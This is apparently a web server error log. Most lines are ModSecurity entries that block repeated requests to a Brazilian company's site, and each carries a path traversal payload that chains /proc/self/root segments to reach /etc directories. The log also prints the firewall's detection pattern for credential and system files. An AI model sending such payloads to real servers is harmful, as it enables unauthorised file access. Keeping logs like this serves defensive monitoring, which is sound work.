[Wed Mar 18 15:02:23.735446 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:39028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abror-w_le52K8_3pV0J_QAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 15:02:27.093991 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:49260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abros-oXxyEfFpUF8f-huAAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:02:35.823677 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:55744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrou8df6f5d65gmYZQC4AAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:37.148889 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:55336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroveyqAr6etmhZHNr2AwAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:41.603850 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.241.31:47136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrowew_le52K8_3pV0KBAAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:43.923155 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.241.31:47150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrow0zinOy1jxa1j4dIsgAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:45.387586 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:47158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroxQkwaGbbGflqUZBAaAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:46.668664 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:47164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroxta6ubjKNq_cu4bLhwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:51.458394 2026] [mime_magic:error] [pid 17887:tid 140411548894976] (70014)End of file found: [client 57.141.18.18:33746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:02:52.231192 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:60746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrozOyqAr6etmhZHNr2CgAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:59.416642 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:60754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro0_u8EFLIOrSqIpsu5gAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:03.837657 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:36398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro1-yqAr6etmhZHNr2EgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:08.558575 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:49270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro2-oXxyEfFpUF8f-iAAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:03:08.559295 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:36410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro2-oXxyEfFpUF8f-h_wAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:10.074293 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:51440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro3uw_le52K8_3pV0KCwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:12.400762 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.241.31:51444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro4EzinOy1jxa1j4dIywAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:14.808604 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:51460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro4uyqAr6etmhZHNr2HQAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:16.136002 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:51466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro5OyqAr6etmhZHNr2IQAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:18.503242 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:42540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro5gbLMZ6AikZjR9Xs1QAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:19.798897 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:42546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro5_u8EFLIOrSqIpsu9QAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:21.117154 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:42554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro6UzinOy1jxa1j4dIzQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:23.587713 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:42560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro69a6ubjKNq_cu4bLlAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:03:42.364605 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:47920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abro_fu8EFLIOrSqIpsvDQAAAlY"], referer: 